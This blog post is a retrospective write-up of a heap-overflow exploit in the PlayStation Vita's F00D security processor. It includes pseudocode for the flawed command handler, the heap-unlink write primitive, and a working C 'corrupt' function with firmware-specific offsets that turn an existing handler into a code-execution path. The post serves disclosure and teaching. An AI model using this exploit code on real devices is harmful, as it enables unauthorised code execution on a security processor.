The First F00D Exploit

This article was originally written 2019-01-11 and published on 2019-07-29 for the third anniversary of HENkaku, the first Vita jailbreak. It documents the work we did in early 2017, just days after the seminal “octopus” exploit. Although the work is dated and does not open any new doors, the technical contents might be interesting for a particular audience. The original intention was to post this after someone else independently discovers the same vulnerability. There were many overt hints on the HENkaku wiki that the 0x50002 service was buggy but I underestimated the interest (or skills) that people would have in hacking an exotic processor that ultimately does nothing for people who just want to run homebrews or play pirated games.

The PlayStation Vita carries a custom designed chip with a security processor running an exotic instruction set (Toshiba MeP). We name this processor F00D and talked about it at length about how we dumped it. However, dumping the private memory isn’t enough. We want code execution and to do that we need to find a memory corruption vulnerability. Thanks to the dumps we got from the octopus exploit and the analysis from the IDA plugin we have all the tools we need to dig deep into the code and look for bugs.

A buggy service

Long before octopus, we found a bug in command 0x50002 in update_service_sm.self. The details of this command are not important, but essentially it performs the per-console encryption of the boot loaders before it is flashed by the updater. To do this, the command takes in a list of memory ranges corresponding to the buffer to encrypt (for the keen minded, this is the same list format as the one discussed in the octopus exploit and is done because F00D does not support virtual memory addressing natively). The bug allowed us to point to pointers in F00D private memory but does not allow us to do anything directly. In order words, we have second level pointers where the second level can be in F00D private memory but not the first level. Unfortunately, we went nowhere with this bug as it seemed difficult to exploit. But it did give us hope seeing that there were missing security checks inside F00D.

After we dumped F00D with octopus, the first thing we decrypted was update_service_sm.self and we took a closer look at 0x50002.

Bigmac batch operations

Before going into the details of the vulnerability, it is important to know how F00D does crypto operations. F00D contains a dedicated crypto hardware accelerator we call “bigmac.” Davee talks about it in his post on a hardware bug found in bigmac. One of the ways of using bigmac is a batch operation where a linked list of operations is passed in. The format of this linked list is as follows:

typedef struct bigmac_op {
  void *src_addr;
  void *dst_addr;
  uint32_t length;
  uint32_t operation; // ex: 0x2000
  uint32_t keyslot; // ex: 0x8
  uint32_t iv; // ex: 0x812d40
  uint32_t field_18; // ex: 0x0
  struct bigmac_op *next;
} __attribute__((packed)) bigmac_op_t;

The fields are self explanatory and all pointers are physical addresses (F00D does not support virtual memory). It is acceptable for src_addr and dst_addr to be the same.

Command 0x50002

Command 0x50002 is used by the updater to encrypt the bootloaders with a console-unique key. This is to protect certain types of downgrade attacks where the attacker can write to the eMMC as well as Syscon but NOT execute arbitrary ARM kernel code. It seems like a contrived attack and it probably is, but Sony’s strategy always seems to be “add crypto first, think later.” However the point of this command isn’t particularly relevant to us. We just care about its operation.

The command takes in a list (maximum number of entries: 0x1F1) of address+length pairs and can operate in two modes. In LV2 mode, the list is interpreted as second level pointers. Each list entry points to a region of LV1 entries (address+length pairs). Each LV1 entry points to a region of memory of arbitrary size that is to be encrypted. In LV1 mode, the list are LV1 entries directly. The reason for having LV2 mode is that Sony does not want to limit themselves to 0x1F1 maximum regions to encrypt in one operation. Let’s take a look at what the command input buffer looks like.

typedef struct {
  void *addr;
  uint32_t length;
} __attribute__((packed)) region_t;

typedef struct {
  uint32_t unused_0[2];
  uint64_t use_lv2_mode; // if 1, use lv2 list
  uint32_t unused_10[3];
  uint32_t list_count; // must be < 0x1F1
  uint32_t unused_20[4];
  uint32_t total_count; // only used in LV1 mode
  uint32_t unused_34[1];
  union {
    region_t lv1[0x1F1];
    region_t lv2[0x1F1];
  } list;
} __attribute__((packed)) cmd_0x50002_t;

In LV2 mode, we set use_lv2_mode = 1 and list_count to be the total number of LV2 entries (max 0x1F1). Then each list.lv2 entry will point to an array of region_t representing LV1 entries. total_count is unused.

In LV1 mode, we set use_lv2_mode = 0 and list_count to be the total number of LV1 entries (max 0x1F1). Then each list.lv1 entry will point to a region to encrypt. total_count is set to the total number of LV1 entries (max 0x1F1).

Wait what?

Did you notice something weird here? If you said “why is the total number of LV1 entries stored twice” then congratulations, you found the first bug. But we’re getting ahead of ourselves. Let’s see how this command works. There are three parts to it. First, the input arguments are parsed and validated. Next, a heap buffer is allocated to convert the the LV1 entries to bigmac AES-128-CBC operations. Finally, bigmac is invoked in batch mode to encrypt all the regions in the LV1 entries. Here is the pseudocode for the first part:

int get_entries(cmd_0x50002_t *args, uint32_t *p_size) {
  if (args->list_count >= 0x1F1) {
    return 0x800F0216;
  }
  if (args->use_lv2_mode == 1) {
    *p_size = 0;
    for (uint32_t i = 0; i < args->list_count; i++) {
      *p_size += (args->list.lv2[i].length) / sizeof(region_t);
      // NOTE: p_size wraparound is NOT checked but this exploit path is harder
    }
  } else {
    *p_size = args->total_count;
  }
  return 0;
}

int handle_0x50002(cmd_0x50002_t *args) {
  int ret;
  uint32_t entries;
  char *buf, buf_aligned;
  bigmac_op_t *batch;

  if ((ret = get_entries(args, &entries)) != 0) {
    return ret;
  }

  // sizeof(bigmac_op_t) == 32
  if ((buf = malloc((entries * sizeof(bigmac_op_t)) + 31)) == NULL) {
    return 0x800F020C;
  }
  // NOTE: the size argument of malloc can also wraparound

  buf_aligned = (buf + 31) & ~31;
  batch = (bigmac_op_t *)buf_aligned;
  if ((ret = create_batch(args, g_iv, batch, entries)) != 0) {
    goto done;
  }

  if ((ret = run_bigmac_batch(batch, entries)) != 0) {
    goto done;
  }

done:
  free(buf);
  return ret;
}

So already we have two bugs. In get_entries, in LV2 mode, *p_size can wraparound and in handle_0x50002 the malloc’s argument can also wraparound. We spent a day trying to exploit this but turns out there is a much easier path. Let’s look at the second part, create_batch:

int init_bigmac_batch(bigmac_op_t *batch, uint32_t entries, int mask, int keyslot, const void *iv) {
  if (entries == 0 || (batch & 31) != 0) {
    return 0x800F0016;
  }

  for (uint32_t i = 0; i < entries; i++) {
    batch[i].operation = mask;
    batch[i].keyslot = keyslot;
    batch[i].iv = iv;
    batch[i].field_18 = 0;
    batch[i].next = &batch[i+1];
  }

  batch[entries-1].next = 0xFFFFFFFF; // indicate end

  return 0;
}

int create_batch(cmd_0x50002_t *args, const void *iv, bigmac_op_t *batch, uint32_t entries) {
  int ret;

  if (args == NULL || batch == NULL || entries == 0) {
    return 0x800F0216;
  }
  
  if ((ret = init_bigmac_batch(batch, entries, 0x2000, 0x8, iv)) != 0) {
    return ret;
  }

  if (args->list_count >= 0x1F1) {
    return 0x800F0216;
  }

  if (args->use_lv2_mode == 1) {
    uint32_t k = 0;
    for (uint32_t i = 0; i < args->list_count; i++) {
      region_t *lv1 = (region_t *)args->list.lv2[i].addr;
      // Sidenote: `lv1` not being checked in the whitelist is the first bug we 
      // found as described in the introduction. We were not able to exploit this.

      for (uint32_t j = 0; j < args->list.lv2[i].length / sizeof(region_t); j++) {
        batch[k].src_addr = lv1[i].addr;
        batch[k].dst_addr = lv1[i].addr;
        batch[k].length = lv1[i].length;
        k++;
        if (!is_region_whitelisted(lv1[i])) {
          return 0x800F0216;
        }
      }
    }
  } else { // LV1 only mode
    for (uint32_t i = 0; i < args->list_count; i++) { // WHAT ABOUT args->total_count?
      batch[i].src_addr = args->list.lv1[i].addr;
      batch[i].dst_addr = args->list.lv1[i].addr;
      batch[i].length = args->list.lv1[i].length;
      if (!is_region_whitelisted(args->list.lv1[i])) {
        // Note: We actually will fail the whitelist check when exploiting the 
        // heap overflow. However, that is fine as batch[i] is written BEFORE 
        // the whitelist check and `free` is always called.
        return 0x800F0216;
      }
    }
  }

  return 0;
}

The easier path as hinted earlier is that args->total_count is never used in create_batch. Let’s look back at what this means. In handle_0x50002, we malloc a buffer of size entries * sizeof(bigmac_op_t)) + 31. entries is returned from get_entries, which in LV1 mode is just args->total_count. However, in create_batch, we use args->list_count as the iterator to write to each entry. That means as long as args->list_count > args->total_count, we have a heap overflow! Now let’s look at how we exploit this.

F00D heap

The update service uses a very simple heap structure. Each heap block contains a 24-byte header and is part of a doubly-linked list. There is no fancy allocation algorithm. There are only two global lists: used and free. Blocks are broken up on malloc and coalesced on free (if there are adjacent free blocks). Blocks are moved from one list to another for malloc and free and are always sorted in order of address. This is what the header looks like:

typedef struct heap_hdr {
  void *data; // point to after `next`
  uint32_t size;
  uint32_t size_aligned;
  uint32_t padding;
  struct heap_hdr *prev;
  struct heap_hdr *next;
} __attribute__((packed)) heap_hdr_t;

When the applet is first started, a 0x4000 byte buffer is set aside to be used for the heap. Both the used and free list are empty.

Memory layout

Let’s say we make a 0x50002 command call in LV1 only mode and args->total_count = 2. That will result in a malloc(2*32+31). Since the empty list is free, we get a large chunk from the initial buffer.

Block allocation

Now we break that chunk into two pieces: the block the heap allocator returns and a free block that is added to the free list. A 24-byte header is added to both blocks in order to keep track of block metadata.

Heap allocation

We zoom into these blocks to see how they are laid out. Notice that we have enough space for two bigmac_op_t as well as some extra space reserved by the alignment.

Heap block before overflow

Now let’s assume we set args->list_count = 4 to trigger a heap overflow. Since args->total_count = 2, we will begin to overwrite some of that extra padding and eventually hit the adjacent free block and start to overwrite the block header. Again, this is because create_batch uses args->list_count when writing to the buffer while handle_0x50002 uses args->total_count to allocate the buffer.

Heap block after overflow

In the diagram above, the dotted outlines represents the two extra blocks create_batch writes. The third block is not too interesting because it mainly overwrites the padding space and some of the free block metadata. The fourth overflow block is the one we’ll use to exploit the applet. Notice how batch[3].length overwrites the prev pointer and batch[3].operation overwrites the next pointer. We fully control batch[3].length because it comes from args->list.lv1[3].length and we partially control batch[3].operation because it is always set to 0x2000.

Now that we control these two pointers, let’s shift our focus to free which will attempt to coalesce these two blocks after freeing the used block because they will be adjacent free blocks. There is code that is similar to the following:

void free(void *buf) {
...
  heap_hdr_t *cur, *adjacent;

  cur = (heap_hdr_t *)cur;
  adjacent = (heap_hdr_t *)(buf + cur->size_aligned);

  // remove from used list
  list_unlink(g_heap_used, cur);

  if (is_in_list(g_heap_free, adjacent)) {
    // remove adjacent from list
    adjacent->prev->next = adjacent->next;
    adjacent->next->prev = adjacent->prev;
    // coalesce
    cur->aligned_size += adjacent->aligned_size + sizeof(heap_hdr_t);
    cur->size = cur->aligned_size;
    // add to free list
    list_link(g_heap_free, cur);
  }
...
}

If we focus on the line adjacent->prev->next = adjacent->next we can see that this is equivalent to *(uint32_t *)batch[3].size = batch[3].operation due to the heap overflow. As explained above, we control both of these fields so in effect, it becomes *(uint32_t *)args->list.lv1[3].length = 0x2000.

At this point, it should be noted that Toshiba MeP processors have two features (or lack of) that makes our lives much easier. First, an invalid memory access will be ignored. This means when we execute the next line adjacent->next->prev = adjacent->prev and notice that adjacent->next->prev is an invalid pointer, we are still fine. Second, there is no memory protection, so we can write directly into executable memory without issue. With that in mind, we can get code execution like we are living in 1990.

Exploiting

Using the heap overflow, we can develop a primitive to corrupt arbitrary F00D memory from ARM by writing 0x2000 to it.

int corrupt(int ctx, uint32_t addr) {
  int ret = 0, sm_ret = 0;
  cmd_0x50002_t args = {0};

  // construct the arguments
  args.use_lv2_mode = 0;
  args.list_count = 3;
  args.total_count = 1;
  // we used 4 blocks in the example to illustrate how things work
  // but actually 3 blocks is enough to trigger the vulnerability

  // first two valid entries to pass whitelist checks
  // we make them arbitrary valid values
  args.list.lv1[0].addr = 0x50000000;
  args.list.lv1[0].length = 0x10;
  args.list.lv1[1].addr = 0x50000000;
  args.list.lv1[1].length = 0x10;
  // here is our overflow entry, which fails checks but does not matter
  // because the free block header is overwritten and free is called 
  // even when there is an error since this is the last entry
  args.list.lv1[2].addr = 0;
  args.list.lv1[2].length = addr - offsetof(heap_hdr_t, next);

  ret = sceSblSmCommCallFunc(ctx, 0x50002, &sm_ret, &args, sizeof(args));
  if (sm_ret < 0) {
    return sm_ret;
  }
  return ret;
}

0x2000 in MeP assembly becomes bsetm ($0),0x0 which does bit-setting. However, that is not important because we can effectively treat it as a NOP and replace arbitrary instructions with this one to bypass checks. Next, we “wrote” our own memcpy by taking an existing command handler in the applet and nopping out instructions until it acted like a memcpy.

// offsets for 1.692, overwrites cmd 0x60002
corrupt(ctx, 0x0080B904);
corrupt(ctx, 0x0080B938);
corrupt(ctx, 0x0080B948);
corrupt(ctx, 0x0080B94C);
corrupt(ctx, 0x0080B950);
corrupt(ctx, 0x0080B958);
corrupt(ctx, 0x0080B95C);
corrupt(ctx, 0x0080B914);
corrupt(ctx, 0x0080B918);

Finally, we need to trigger an icache flush by calling some random command (making it fetch new instructions and evict old cache entries). Then we can memcpy our F00D code in and run it! Overall this was a simple vulnerability and there were no exploit mitigation in place. However, it would have been much more difficult to find this vulnerability and exploit it blind. Most of the security in F00D comes from the fact that it has a small attack surface as well as the fact that the interface and software are all proprietary. Once you look at the code though, attacking it becomes a lot less intimidating.

Yifan Lu

Random stuff I'm making and thinking